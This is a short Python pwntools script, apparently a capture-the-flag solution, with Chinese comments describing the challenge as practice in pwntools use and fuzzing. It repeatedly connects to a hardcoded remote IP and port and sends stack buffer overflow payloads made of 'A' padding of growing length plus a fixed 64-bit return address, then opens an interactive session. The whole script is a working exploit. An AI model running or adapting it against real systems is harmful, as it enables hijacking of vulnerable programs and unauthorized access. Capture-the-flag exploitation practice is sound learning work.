from pwn import *
from LibcSearcher import *

context(os='linux',arch='amd64',log_level='debug')
# io  = remote('192.168.95.131',10001)
io = remote('111.200.241.244',59530)

# elf = ELF('')
pause()

addr = 0x40060d

# 模糊测试，大概 就是 求 b"A"*n + p?(addr)
# 可能是 32 也可能是 64 位，所以分开做。
# 需要手动 ctrl + d 打断 interactive
# 这题主要还是考 对pwntools 的使用 和 fuzzy
def fuzzy_x86(index):
    payload = b""
    for i in range(0,index):
        payload += b"A"
    payload += p32(addr)
    return payload


def fuzzy_x64(index):
    payload = b""
    for i in range(0,index):
        payload += b"A"
    payload += p64(addr)
    return payload

if __name__ == "__main__":
    for i in range(0,100):
        try:
            io = remote('111.200.241.244',59530)
            payload = fuzzy_x64(i)
            io.recvuntil(b">")
            io.sendline(payload)
            io.interactive()
            io.close()
        except:
            io.close()